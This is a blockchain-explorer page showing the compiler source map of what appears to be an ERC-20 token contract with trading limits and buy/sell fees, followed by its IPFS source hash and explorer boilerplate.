:::i;22236:37::-;;;;;;;;;;;;22272:1;22236:37;;22800:27;;;;;;;;;;;;;;;;13130:413;;;;;;;;;;-1:-1:-1;13130:413:0;;;;;:::i;:::-;;:::i;10324:175::-;;;;;;;;;;-1:-1:-1;10324:175:0;;;;;:::i;:::-;;:::i;23284:57::-;;;;;;;;;;-1:-1:-1;23284:57:0;;;;;:::i;:::-;;;;;;;;;;;;;;;;22718:33;;;;;;;;;;-1:-1:-1;22718:33:0;;;;;;;;23348:40;;;;;;;;;;-1:-1:-1;23348:40:0;;;;;;;;22603:35;;;;;;;;;;;;;;;;22119:42;;;;;;;;;;;;22159:2;22119:42;;10562:151;;;;;;;;;;-1:-1:-1;10562:151:0;;;;;:::i;:::-;-1:-1:-1;;;;;10678:18:0;;;10651:7;10678:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;10562:151;22676:33;;;;;;;;;;;;;;;;2863:201;;;;;;;;;;-1:-1:-1;2863:201:0;;;;;:::i;:::-;;:::i;22645:24::-;;;;;;;;;;;;;;;;8693:100;8747:13;8780:5;8773:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8693:100;:::o;10860:169::-;10943:4;10960:39;901:10;10983:7;10992:6;10960:8;:39::i;:::-;-1:-1:-1;11017:4:0;10860:169;;;;;:::o;11511:492::-;11651:4;11668:36;11678:6;11686:9;11697:6;11668:9;:36::i;:::-;-1:-1:-1;;;;;11744:19:0;;11717:24;11744:19;;;:11;:19;;;;;;;;901:10;11744:33;;;;;;;;11796:26;;;;11788:79;;;;-1:-1:-1;;;11788:79:0;;3945:2:1;11788:79:0;;;3927:21:1;3984:2;3964:18;;;3957:30;4023:34;4003:18;;;3996:62;-1:-1:-1;;;4074:18:1;;;4067:38;4122:19;;11788:79:0;;;;;;;;;11903:57;11912:6;901:10;11953:6;11934:16;:25;11903:8;:57::i;:::-;-1:-1:-1;11991:4:0;;11511:492;-1:-1:-1;;;;11511:492:0:o;12412:215::-;901:10;12500:4;12549:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;12549:34:0;;;;;;;;;;12500:4;;12517:80;;12540:7;;12549:47;;12586:10;;12549:47;:::i;:::-;12517:8;:80::i;2605:103::-;2027:6;;-1:-1:-1;;;;;2027:6:0;901:10;2174:23;2166:68;;;;-1:-1:-1;;;2166:68:0;;;;;;;:::i;:::-;2670:30:::1;2697:1;2670:18;:30::i;:::-;2605:103::o:0;25627:121::-;2027:6;;25679:4;;-1:-1:-1;;;;;2027:6:0;901:10;2174:23;2166:68;;;;-1:-1:-1;;;2166:68:0;;;;;;;:::i;:::-;-1:-1:-1;25696:14:0::1;:22:::0;;-1:-1:-1;;25696:22:0::1;::::0;;:14:::1;25627:121:::0;:::o;25477:120::-;2027:6;;-1:-1:-1;;;;;2027:6:0;901:10;2174:23;2166:68;;;;-1:-1:-1;;;2166:68:0;;;;;;;:::i;:::-;25532:13:::1;:20:::0;;-1:-1:-1;;25532:20:0::1;25548:4;25532:20;::::0;;25577:12:::1;25563:11;:26:::0;25477:120::o;8912:104::-;8968:13;9001:7;8994:14;;;;;:::i;13130:413::-;901:10;13223:4;13267:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;13267:34:0;;;;;;;;;;13320:35;;;;13312:85;;;;-1:-1:-1;;;13312:85:0;;4977:2:1;13312:85:0;;;4959:21:1;5016:2;4996:18;;;4989:30;5055:34;5035:18;;;5028:62;-1:-1:-1;;;5106:18:1;;;5099:35;5151:19;;13312:85:0;4775:401:1;13312:85:0;13433:67;901:10;13456:7;13484:15;13465:16;:34;13433:8;:67::i;:::-;-1:-1:-1;13531:4:0;;13130:413;-1:-1:-1;;;13130:413:0:o;10324:175::-;10410:4;10427:42;901:10;10451:9;10462:6;10427:9;:42::i;2863:201::-;2027:6;;-1:-1:-1;;;;;2027:6:0;901:10;2174:23;2166:68;;;;-1:-1:-1;;;2166:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;2952:22:0;::::1;2944:73;;;::::0;-1:-1:-1;;;2944:73:0;;5383:2:1;2944:73:0::1;::::0;::::1;5365:21:1::0;5422:2;5402:18;;;5395:30;5461:34;5441:18;;;5434:62;-1:-1:-1;;;5512:18:1;;;5505:36;5558:19;;2944:73:0::1;5181:402:1::0;2944:73:0::1;3028:28;3047:8;3028:18;:28::i;:::-;2863:201:::0;:::o;17706:380::-;-1:-1:-1;;;;;17842:19:0;;17834:68;;;;-1:-1:-1;;;17834:68:0;;5790:2:1;17834:68:0;;;5772:21:1;5829:2;5809:18;;;5802:30;5868:34;5848:18;;;5841:62;-1:-1:-1;;;5919:18:1;;;5912:34;5963:19;;17834:68:0;5588:400:1;17834:68:0;-1:-1:-1;;;;;17921:21:0;;17913:68;;;;-1:-1:-1;;;17913:68:0;;6195:2:1;17913:68:0;;;6177:21:1;6234:2;6214:18;;;6207:30;6273:34;6253:18;;;6246:62;-1:-1:-1;;;6324:18:1;;;6317:32;6366:19;;17913:68:0;5993:398:1;17913:68:0;-1:-1:-1;;;;;17994:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;18046:32;;1361:25:1;;;18046:32:0;;1334:18:1;18046:32:0;;;;;;;17706:380;;;:::o;26313:4876::-;-1:-1:-1;;;;;26445:18:0;;26437:68;;;;-1:-1:-1;;;26437:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;26524:16:0;;26516:64;;;;-1:-1:-1;;;26516:64:0;;7004:2:1;26516:64:0;;;6986:21:1;7043:2;7023:18;;;7016:30;7082:34;7062:18;;;7055:62;-1:-1:-1;;;7133:18:1;;;7126:33;7176:19;;26516:64:0;6802:399:1;26516:64:0;26597:6;26607:1;26597:11;26593:93;;26625:28;26641:4;26647:2;26651:1;26625:15;:28::i;:::-;26313:4876;;;:::o;26593:93::-;26702:14;;;;;;;26698:1697;;;2027:6;;-1:-1:-1;;;;;26755:15:0;;;2027:6;;26755:15;;;;:49;;-1:-1:-1;2027:6:0;;-1:-1:-1;;;;;26791:13:0;;;2027:6;;26791:13;;26755:49;:91;;;;-1:-1:-1;;;;;;26825:21:0;;26839:6;26825:21;;26755:91;:128;;;;-1:-1:-1;;;;;;26867:16:0;;;;26755:128;:158;;;;-1:-1:-1;26905:8:0;;;;26904:9;26755:158;26733:1651;;;26953:13;;;;26948:224;;-1:-1:-1;;;;;27025:25:0;;;;;;:19;:25;;;;;;;;;:52;;-1:-1:-1;;;;;;27054:23:0;;;;;;:19;:23;;;;;;;;27025:52;26991:161;;;;-1:-1:-1;;;26991:161:0;;7408:2:1;26991:161:0;;;7390:21:1;7447:2;7427:18;;;7420:30;7486:25;7466:18;;;7459:53;7529:18;;26991:161:0;7206:347:1;26991:161:0;-1:-1:-1;;;;;27245:31:0;;;;;;:25;:31;;;;;;;;:92;;;;-1:-1:-1;;;;;;27302:35:0;;;;;;:31;:35;;;;;;;;27301:36;27245:92;27219:1150;;;27424:20;;27414:6;:30;;27380:169;;;;-1:-1:-1;;;27380:169:0;;7760:2:1;27380:169:0;;;7742:21:1;7799:2;7779:18;;;7772:30;7838:34;7818:18;;;7811:62;-1:-1:-1;;;7889:18:1;;;7882:51;7950:19;;27380:169:0;7558:417:1;27380:169:0;27632:9;;-1:-1:-1;;;;;10085:18:0;;10058:7;10085:18;;;;;;;;;;;27606:22;;:6;:22;:::i;:::-;:35;;27572:141;;;;-1:-1:-1;;;27572:141:0;;8182:2:1;27572:141:0;;;8164:21:1;8221:2;8201:18;;;8194:30;-1:-1:-1;;;8240:18:1;;;8233:50;8300:18;;27572:141:0;7980:344:1;27572:141:0;27219:1150;;;-1:-1:-1;;;;;27812:29:0;;;;;;:25;:29;;;;;;;;:92;;;;-1:-1:-1;;;;;;27867:37:0;;;;;;:31;:37;;;;;;;;27866:38;27812:92;27786:583;;;27991:20;;27981:6;:30;;27947:170;;;;-1:-1:-1;;;27947:170:0;;8531:2:1;27947:170:0;;;8513:21:1;8570:2;8550:18;;;8543:30;8609:34;8589:18;;;8582:62;-1:-1:-1;;;8660:18:1;;;8653:52;8722:19;;27947:170:0;8329:418:1;27786:583:0;-1:-1:-1;;;;;28148:35:0;;;;;;:31;:35;;;;;;;;28143:226;;28268:9;;-1:-1:-1;;;;;10085:18:0;;10058:7;10085:18;;;;;;;;;;;28242:22;;:6;:22;:::i;:::-;:35;;28208:141;;;;-1:-1:-1;;;28208:141:0;;8182:2:1;28208:141:0;;;8164:21:1;8221:2;8201:18;;;8194:30;-1:-1:-1;;;8240:18:1;;;8233:50;8300:18;;28208:141:0;7980:344:1;28208:141:0;-1:-1:-1;;;;;28412:25:0;;;;;;:19;:25;;;;;;;;;:52;;-1:-1:-1;;;;;;28441:23:0;;;;;;:19;:23;;;;;;;;28412:52;28411:77;;;;-1:-1:-1;;;;;;28469:19:0;;28483:4;28469:19;;28411:77;:102;;;;-1:-1:-1;;;;;;28492:21:0;;28508:4;28492:21;;28411:102;28407:166;;;28546:15;28530:13;:31;28407:166;-1:-1:-1;;;;;28587:25:0;;;;;;:19;:25;;;;;;;;:58;;;;;28617:19;:28;28637:7;2027:6;;-1:-1:-1;;;;;2027:6:0;;1954:87;28637:7;-1:-1:-1;;;;;28617:28:0;;;;;;;;;;;;-1:-1:-1;28617:28:0;;;;28616:29;28587:58;28583:146;;;28662:34;28679:4;28685:2;28689:6;28662:16;:34::i;28583:146::-;-1:-1:-1;;;;;28744:25:0;;;;;;:19;:25;;;;;;;;28743:26;:54;;;;-1:-1:-1;;;;;;28774:23:0;;;;;;:19;:23;;;;;;;;28773:24;28743:54;28739:552;;;-1:-1:-1;;;;;28819:31:0;;;;;;:25;:31;;;;;;;;28814:466;;-1:-1:-1;;;;;28906:18:0;;28871:32;28906:18;;;:12;:18;;;;;28980:13;;28960:17;;:33;;28980:13;28960:33;:::i;:::-;28943:14;;;:50;29033:15;29012:18;;;;:36;28814:466;;;-1:-1:-1;;;;;29124:16:0;;29089:32;29124:16;;;:12;:16;;;;;29163:17;;29124:16;;29163:22;29159:106;;29230:15;29210:35;;29159:106;29070:210;28814:466;29303:16;29338:11;;29352:1;29338:15;;;;:::i;:::-;29322:12;:32;29303:51;;29365:12;29402:24;29420:4;-1:-1:-1;;;;;10085:18:0;10058:7;10085:18;;;;;;;;;;;;9984:127;29402:24;29380:18;;:46;;29365:61;;29457:7;:36;;;;;29482:11;29481:12;29457:36;:62;;;;-1:-1:-1;29511:8:0;;;;29510:9;29457:62;:111;;;;-1:-1:-1;;;;;;29537:31:0;;;;;;:25;:31;;;;;;;;29536:32;29457:111;:154;;;;-1:-1:-1;;;;;;29586:25:0;;;;;;:19;:25;;;;;;;;29585:26;29457:154;:195;;;;-1:-1:-1;;;;;;29629:23:0;;;;;;:19;:23;;;;;;;;29628:24;29457:195;29439:327;;;29679:8;:15;;-1:-1:-1;;29679:15:0;29690:4;29679:15;;;29711:10;:8;:10::i;:::-;29738:8;:16;;-1:-1:-1;;29738:16:0;;;29439:327;29795:8;;-1:-1:-1;;;;;29906:25:0;;29778:13;29906:25;;;:19;:25;;;;;;29795:8;;;;29794:9;;29906:25;;:52;;-1:-1:-1;;;;;;29935:23:0;;;;;;:19;:23;;;;;;;;29906:52;29902:101;;;-1:-1:-1;29986:5:0;29902:101;30015:12;30118:8;30114:1022;;;30148:11;30143:844;;-1:-1:-1;;;;;30211:31:0;;;;;;:25;:31;;;;;;;;30207:345;;;30297:3;30275:18;22272:1;30275:6;:18;:::i;:::-;30274:26;;;;:::i;:::-;30267:33;;30339:4;30323:12;;:20;;;;;;;:::i;:::-;;;;-1:-1:-1;30143:844:0;;-1:-1:-1;30143:844:0;30207:345;-1:-1:-1;;;;;30401:29:0;;;;;;:25;:29;;;;;;;;30397:155;;;30486:3;30463:19;22317:1;30463:6;:19;:::i;30397:155::-;30143:844;;;-1:-1:-1;;;;;30623:31:0;;;;;;:25;:31;;;;;;;;30619:353;;;30713:3;30687:22;22159:2;30687:6;:22;:::i;30619:353::-;-1:-1:-1;;;;;30817:29:0;;;;;;:25;:29;;;;;;;;30813:159;;;30906:3;30879:23;22209:2;30879:6;:23;:::i;:::-;30878:31;;;;:::i;:::-;30871:38;;30948:4;30932:12;;:20;;;;;;;:::i;:::-;;;;-1:-1:-1;;30813:159:0;31007:8;;31003:91;;31036:42;31052:4;31066;31073;31036:15;:42::i;:::-;31110:14;31120:4;31110:14;;:::i;:::-;;;30114:1022;31148:33;31164:4;31170:2;31174:6;31148:15;:33::i;:::-;26426:4763;;;;26313:4876;;;:::o;3224:191::-;3317:6;;;-1:-1:-1;;;;;3334:17:0;;;-1:-1:-1;;;;;;3334:17:0;;;;;;;3367:40;;3317:6;;;3334:17;3317:6;;3367:40;;3298:16;;3367:40;3287:128;3224:191;:::o;14033:651::-;-1:-1:-1;;;;;14173:20:0;;14165:70;;;;-1:-1:-1;;;14165:70:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;14332:17:0;;14308:21;14332:17;;;;;;;;;;;14368:23;;;;14360:74;;;;-1:-1:-1;;;14360:74:0;;9482:2:1;14360:74:0;;;9464:21:1;9521:2;9501:18;;;9494:30;9560:34;9540:18;;;9533:62;-1:-1:-1;;;9611:18:1;;;9604:36;9657:19;;14360:74:0;9280:402:1;14360:74:0;-1:-1:-1;;;;;14470:17:0;;;:9;:17;;;;;;;;;;;14490:22;;;14470:42;;14534:20;;;;;;;;:30;;14506:6;;14470:9;14534:30;;14506:6;;14534:30;:::i;:::-;;;;;;;;14599:9;-1:-1:-1;;;;;14582:35:0;14591:6;-1:-1:-1;;;;;14582:35:0;;14610:6;14582:35;;;;1361:25:1;;1349:2;1334:18;;1215:177;14582:35:0;;;;;;;;14154:530;14033:651;;;:::o;15174:484::-;-1:-1:-1;;;;;15391:17:0;;;15367:21;15391:17;;;;;;;;;;;;;15464:22;;;15444:42;;;15508:20;;;;;;;:30;;15480:6;;15367:21;15508:30;;15480:6;;15508:30;:::i;31794:552::-;31877:4;31833:23;10085:18;;;;;;;;;;;31922:12;;31951:20;;;:46;;-1:-1:-1;31975:22:0;;31951:46;31947:85;;;32014:7;;31794:552::o;31947:85::-;32066:18;;:23;;32087:2;32066:23;:::i;:::-;32048:15;:41;32044:115;;;32124:18;;:23;;32145:2;32124:23;:::i;:::-;32106:41;;32044:115;32171:33;32188:15;32171:16;:33::i;:::-;32230:1;32215:12;:16;;;32281:57;;22379:42;;32312:21;;32230:1;32281:57;32230:1;32281:57;32312:21;22379:42;32281:57;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;31794:552:0:o;31197:589::-;31347:16;;;31361:1;31347:16;;;;;;;;31323:21;;31347:16;;;;;;;;;;-1:-1:-1;31347:16:0;31323:40;;31392:4;31374;31379:1;31374:7;;;;;;;;:::i;:::-;;;;;;:23;-1:-1:-1;;;;;31374:23:0;;;-1:-1:-1;;;;;31374:23:0;;;;;31418:15;-1:-1:-1;;;;;31418:20:0;;:22;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;31408:4;31413:1;31408:7;;;;;;;;:::i;:::-;;;;;;:32;-1:-1:-1;;;;;31408:32:0;;;-1:-1:-1;;;;;31408:32:0;;;;;31453:62;31470:4;31485:15;31503:11;31453:8;:62::i;:::-;31554:224;;-1:-1:-1;;;31554:224:0;;-1:-1:-1;;;;;31554:15:0;:66;;;;:224;;31635:11;;31661:1;;31705:4;;31732;;31752:15;;31554:224;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14:548:1;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:131::-;-1:-1:-1;;;;;642:31:1;;632:42;;622:70;;688:1;685;678:12;703:315;771:6;779;832:2;820:9;811:7;807:23;803:32;800:52;;;848:1;845;838:12;800:52;887:9;874:23;906:31;931:5;906:31;:::i;:::-;956:5;1008:2;993:18;;;;980:32;;-1:-1:-1;;;703:315:1:o;1631:456::-;1708:6;1716;1724;1777:2;1765:9;1756:7;1752:23;1748:32;1745:52;;;1793:1;1790;1783:12;1745:52;1832:9;1819:23;1851:31;1876:5;1851:31;:::i;:::-;1901:5;-1:-1:-1;1958:2:1;1943:18;;1930:32;1971:33;1930:32;1971:33;:::i;:::-;1631:456;;2023:7;;-1:-1:-1;;;2077:2:1;2062:18;;;;2049:32;;1631:456::o;2489:247::-;2548:6;2601:2;2589:9;2580:7;2576:23;2572:32;2569:52;;;2617:1;2614;2607:12;2569:52;2656:9;2643:23;2675:31;2700:5;2675:31;:::i;:::-;2725:5;2489:247;-1:-1:-1;;;2489:247:1:o;2965:388::-;3033:6;3041;3094:2;3082:9;3073:7;3069:23;3065:32;3062:52;;;3110:1;3107;3100:12;3062:52;3149:9;3136:23;3168:31;3193:5;3168:31;:::i;:::-;3218:5;-1:-1:-1;3275:2:1;3260:18;;3247:32;3288:33;3247:32;3288:33;:::i;:::-;3340:7;3330:17;;;2965:388;;;;;:::o;3358:380::-;3437:1;3433:12;;;;3480;;;3501:61;;3555:4;3547:6;3543:17;3533:27;;3501:61;3608:2;3600:6;3597:14;3577:18;3574:38;3571:161;;3654:10;3649:3;3645:20;3642:1;3635:31;3689:4;3686:1;3679:15;3717:4;3714:1;3707:15;3571:161;;3358:380;;;:::o;4152:127::-;4213:10;4208:3;4204:20;4201:1;4194:31;4244:4;4241:1;4234:15;4268:4;4265:1;4258:15;4284:125;4349:9;;;4370:10;;;4367:36;;;4383:18;;:::i;4414:356::-;4616:2;4598:21;;;4635:18;;;4628:30;4694:34;4689:2;4674:18;;4667:62;4761:2;4746:18;;4414:356::o;6396:401::-;6598:2;6580:21;;;6637:2;6617:18;;;6610:30;6676:34;6671:2;6656:18;;6649:62;-1:-1:-1;;;6742:2:1;6727:18;;6720:35;6787:3;6772:19;;6396:401::o;8752:128::-;8819:9;;;8840:11;;;8837:37;;;8854:18;;:::i;8885:168::-;8958:9;;;8989;;9006:15;;;9000:22;;8986:37;8976:71;;9027:18;;:::i;9058:217::-;9098:1;9124;9114:132;;9168:10;9163:3;9159:20;9156:1;9149:31;9203:4;9200:1;9193:15;9231:4;9228:1;9221:15;9114:132;-1:-1:-1;9260:9:1;;9058:217::o;10029:127::-;10090:10;10085:3;10081:20;10078:1;10071:31;10121:4;10118:1;10111:15;10145:4;10142:1;10135:15;10161:251;10231:6;10284:2;10272:9;10263:7;10259:23;10255:32;10252:52;;;10300:1;10297;10290:12;10252:52;10332:9;10326:16;10351:31;10376:5;10351:31;:::i;10417:980::-;10679:4;10727:3;10716:9;10712:19;10758:6;10747:9;10740:25;10784:2;10822:6;10817:2;10806:9;10802:18;10795:34;10865:3;10860:2;10849:9;10845:18;10838:31;10889:6;10924;10918:13;10955:6;10947;10940:22;10993:3;10982:9;10978:19;10971:26;;11032:2;11024:6;11020:15;11006:29;;11053:1;11063:195;11077:6;11074:1;11071:13;11063:195;;;11142:13;;-1:-1:-1;;;;;11138:39:1;11126:52;;11233:15;;;;11198:12;;;;11174:1;11092:9;11063:195;;;-1:-1:-1;;;;;;;11314:32:1;;;;11309:2;11294:18;;11287:60;-1:-1:-1;;;11378:3:1;11363:19;11356:35;11275:3;10417:980;-1:-1:-1;;;10417:980:1:o
Swarm Source
ipfs://df8b71479f485e0cabd3b7fcdef757173baec65587f106a74ede299665fcf40c
Loading...
Loading
Loading...
Loading
Multichain Portfolio | 30 Chains
Chain | Token | Portfolio % | Price | Amount | Value |
---|
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.